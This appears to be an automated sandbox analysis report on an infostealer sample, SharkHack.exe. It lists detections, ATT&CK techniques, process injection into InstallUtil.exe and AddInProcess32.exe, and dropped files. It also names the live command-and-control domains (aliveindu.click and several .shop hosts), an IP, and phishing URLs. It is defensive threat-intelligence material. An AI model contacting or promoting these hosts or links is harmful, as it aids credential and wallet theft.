                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Valid Accounts                          		1
                          Scheduled Task/Job                          		1
                          Valid Accounts                          		1
                          Valid Accounts                          		1
                          Masquerading                          		OS Credential Dumping111
                          Security Software Discovery                          		Remote Services1
                          Screen Capture                          		11
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          PowerShell                          		1
                          Scheduled Task/Job                          		1
                          Access Token Manipulation                          		1
                          Valid Accounts                          		LSASS Memory1
                          Process Discovery                          		Remote Desktop Protocol11
                          Archive Collected Data                          		2
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		311
                          Process Injection                          		1
                          Access Token Manipulation                          		Security Account Manager141
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin Shares1
                          Data from Local System                          		113
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          Scheduled Task/Job                          		1
                          Disable or Modify Tools                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object Model2
                          Clipboard Data                          		Protocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          DLL Side-Loading                          		141
                          Virtualization/Sandbox Evasion                          		LSA Secrets22
                          System Information Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                          Process Injection                          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                          Deobfuscate/Decode Files or Information                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Hidden Files and Directories                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt3
                          Obfuscated Files or Information                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                          Software Packing                          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                          DLL Side-Loading                          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582497 Sample: SharkHack.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 29 aliveindu.click 2->29 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 10 other signatures 2->39 8 SharkHack.exe 3 2->8         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\SharkHack.exe.log, ASCII 8->27 dropped 43 Found many strings related to Crypto-Wallets (likely being stolen) 8->43 45 Writes to foreign memory regions 8->45 47 Allocates memory in foreign processes 8->47 49 4 other signatures 8->49 12 InstallUtil.exe 3 8->12         started        15 InstallUtil.exe 2 8->15         started        17 InstallUtil.exe 8->17         started        19 InstallUtil.exe 8->19         started        signatures6 process7 signatures8 51 Writes to foreign memory regions 12->51 53 Allocates memory in foreign processes 12->53 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->55 57 2 other signatures 12->57 21 AddInProcess32.exe 12->21         started        25 WerFault.exe 22 12 15->25         started        process9 dnsIp10 31 aliveindu.click 104.21.64.143, 443, 50013, 50014 CLOUDFLARENETUS United States 21->31 41 Found many strings related to Crypto-Wallets (likely being stolen) 21->41 signatures11

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          SharkHack.exe100%AviraHEUR/AGEN.1314429
                          SharkHack.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://aliveindu.click/0%Avira URL Cloudsafe
                          https://aliveindu.click/6(0%Avira URL Cloudsafe
                          https://aliveindu.click:443/api0%Avira URL Cloudsafe
                          https://aliveindu.click/api0%Avira URL Cloudsafe
                          aliveindu.click0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          aliveindu.click
                          		104.21.64.143
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            rabidcowse.shopfalse
                              		high
                              wholersorie.shopfalse
                                		high
                                cloudewahsj.shopfalse
                                  		high
                                  noisycuttej.shopfalse
                                    		high
                                    https://aliveindu.click/apitrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    nearycrepso.shopfalse
                                      		high
                                      aliveindu.clicktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      framekgirus.shopfalse
                                        		high
                                        tirepublicerj.shopfalse
                                          		high
                                          abruptyopsn.shopfalse
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.apache.org/licenses/LICENSE-2.0SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designersGSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/?SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/bTheSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers?SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.quotable.io/random?tags=loveSharkHack.exefalse
                                                          		high
                                                          http://www.tiro.comSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designersSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.goodfont.co.krSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.carterandcone.comlSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.sajatypeworks.comSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.typography.netDSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fontbureau.com/designers/cabarga.htmlNSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.founder.com.cn/cn/cTheSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://aliveindu.click/AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.2925272325.0000000001464000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.galapagosdesign.com/staff/dennis.htmSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.founder.com.cn/cnSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/frere-user.htmlSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.microAddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.jiyu-kobo.co.jp/SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.galapagosdesign.com/DPleaseSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.fontbureau.com/designers8SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://aliveindu.click/6(AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.fonts.comSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.sandoll.co.krSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.urwpp.deDPleaseSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.zhongyicts.com.cnSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.sakkal.comSharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://aliveindu.click:443/apiAddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.64.143
                                                                                                      		aliveindu.clickUnited States
                                                                                                      		13335CLOUDFLARENETUStrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1582497
                                                                                                      Start date and time:2024-12-30 18:44:06 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 13s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:15
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:SharkHack.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@12/5@1/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 91%
                                                                                                      • Number of executed functions: 190
                                                                                                      • Number of non-executed functions: 30
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45, 20.190.159.0
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: SharkHack.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      12:45:30API Interceptor766694x Sleep call for process: SharkHack.exe modified
                                                                                                      12:46:54API Interceptor12x Sleep call for process: InstallUtil.exe modified
                                                                                                      12:47:00API Interceptor2x Sleep call for process: AddInProcess32.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.64.143random.exeGet hashmaliciousLummaCBrowse

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        aliveindu.clickrandom.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSActive_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.96.3
                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.97.3
                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.0.151
                                                                                                        https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                        • 104.17.25.14
                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                        • 1.1.1.1
                                                                                                        https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                        • 104.18.87.62
                                                                                                        BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                        • 172.64.41.3
                                                                                                        UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.96.1

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.143
                                                                                                        PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                        • 104.21.64.143
                                                                                                        universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.64.143
                                                                                                        Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                        • 104.21.64.143

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER11DB.tmp.dmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 17:46:56 2024, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):183700
                                                                                                        Entropy (8bit):4.0435478722921046
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:pN0/IHuBojR3pN4uE2aOdzLTgpA1/BOyFSVXkoUDAe7yI1Q6CDitT6VKyESIQX0H:pNDH4uEqdzLTgpA/Fy0oVf8i
                                                                                                        MD5:0F504A156644B0CB412B145AAAB49457
                                                                                                        SHA1:0E4E705BDE646215FE51B0BA7BAC1AECC0C8BF4B
                                                                                                        SHA-256:0F69A03C588A243B35F8A839019D154C953D155B7C1482D8F7405C01581B2DD9
                                                                                                        SHA-512:D00C2560C2748EFEA998D16F97C642D3C15367846C37CF0E9F04C9B5FBF673BD34B13DAFC3BF84F020BB75CF42376C13774A8C590DF10DEA0886EF96FA13FBCC
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:MDMP..a..... .........rg........................l...........$...........T...~=..........`.......8...........T...........p'..$...........(...........................................................................................eJ..............GenuineIntel............T.......X...n.rg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER12E5.tmp.WERInternalMetadata.xml

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8342
                                                                                                        Entropy (8bit):3.6968573429082787
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:R6l7wVeJtOh6nu6YR36J3gmfid40Ipr+89bRosfv87m:R6lXJ06u6YB65gmfM40aRbfvt
                                                                                                        MD5:03BDF1C738462AFB49E44B7EFE1259EC
                                                                                                        SHA1:1078DEE3DA6FAE2611C191DBB435B63362705419
                                                                                                        SHA-256:7FF629FEEB984CE28BB84412AA01EBCB4456DBE0529D8F5742D5E9708F177EB4
                                                                                                        SHA-512:32666A4C75357F173B8BB58492C0B39481ACBB56A7ED2459ADF38DBA5DD5CBC30000AA0DC1174362F931FAB169471DF62E93C35DF51C13D75894E158620767DD
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.4.<./.P.i.

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1325.tmp.xml

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4676
                                                                                                        Entropy (8bit):4.4778658379168865
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwWl8zs5EJg77aI9EPWpW8VYtYm8M4JnfjFd2+q8rQ2lZR6em9d:uIjfoI7Ke7VxJ/2olZAem9d
                                                                                                        MD5:47769FA59CE029B92EDD4621A51A012D
                                                                                                        SHA1:16CEF4DA3623DE1290A97FA1409FD2D56F0607B1
                                                                                                        SHA-256:BA65132048DAA0B4E167DC2FD8F40876B0CFA5EE1A759D389E2802C4BFC127D2
                                                                                                        SHA-512:F7637E1C7D65660741CDA0A5AA24C4C7F3D5511625796A2A456EB11D0ED5BA25CC6C86A5BCB396365D26A7B7F17A80C04D793D710F5D6E5EA10F6904FABCAAF6
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="654289" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
                                                                                                        MD5:EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
                                                                                                        SHA1:B2A052ACB64FC7173E568E1520AA4D713C5E90A3
                                                                                                        SHA-256:50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
                                                                                                        SHA-512:D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
                                                                                                        Malicious:false
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SharkHack.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\SharkHack.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
                                                                                                        MD5:EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
                                                                                                        SHA1:B2A052ACB64FC7173E568E1520AA4D713C5E90A3
                                                                                                        SHA-256:50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
